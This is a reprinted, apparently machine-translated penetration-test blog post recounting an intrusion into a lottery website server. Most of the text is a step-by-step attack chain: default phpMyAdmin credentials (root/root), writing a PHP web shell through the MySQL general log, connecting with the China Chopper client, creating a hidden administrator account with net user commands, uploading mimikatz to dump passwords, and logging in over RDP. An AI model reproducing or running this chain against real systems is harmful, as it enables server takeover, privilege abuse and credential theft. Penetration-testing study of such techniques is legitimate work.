Title: Penetration Series: Fighting Lottery Station

Get phpmyadmin weak password

The ip of the lottery site is xxx through information, and the detection scan reveals that phpmyadmin exists. Through guessing, use the default weak password (root/root) to log in to phpmyadmin.

Write shell to log file through phpmyadmin background sql query

Use phpmyadmin's SQL query function to write a sentence Trojan to the log file.

The process and command are as follows :

1. Turn on the log function: set global general_log=on;

2. Click the phpmyadmin variable to view the log file name :

The log file here is test.php.

3. Execute SQL command and write a sentence to the log file : SELECT'?php assert($_POST['test']);';

4. Return after successful execution.

5. View log files.

6. Add the user by connecting the kitchen knife and upload mimikatz.

Use kitchen knife to connect to log file Trojan, xxx/test.php password :test

Check and find that it is the system administrator system permission, just add the user and add it to the management group.

The command is : C:\Windows\system32\net.exe user Test Test!@#123 /add

C:\Windows\system32\net.exe localgroup administrators Test /add

Upload mimikataz to the server.

7. 3389 connection and read the administrator password.

(1) Direct telnet ip 3389 test found that it is accessible, so I directly connected 3389 to enter.

(2) Or the following command is executed on the kitchen knife here to query the port open by 3389.

Step 1 : tasklist /svc | findstr TermService query the process of remote desktop service

Step 2 : netstat -ano | findstr **** //Check the port number corresponding to the remote desktop service process number.

(3) Execute mimikatz and read the administrator group login password.

(4) Use the obtained administrator/xxxx account password to log in to the server remotely.

It was found that the server used phpmystudy to build a lottery station in batches. There were about a dozen sites, and they could access the website domain names on several servers at will. Some screenshots are as follows :

System 1 :

System 2 :

System :

Backstage 1 :

Backstage 2 :

Reprinted from the original link: https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==mid=2247487003idx=1sn=5c85b34ce6ffb400fdf858737e34df3dchksm=ce67a482f9102d9405e838f34479dc8d1c6b793d3b6d4f40d9b3cec9cc87f14555d865cb3ddcscene=21#wechat_redirect

https://blog.csdn.net/weixin_39997829/article/details/109186917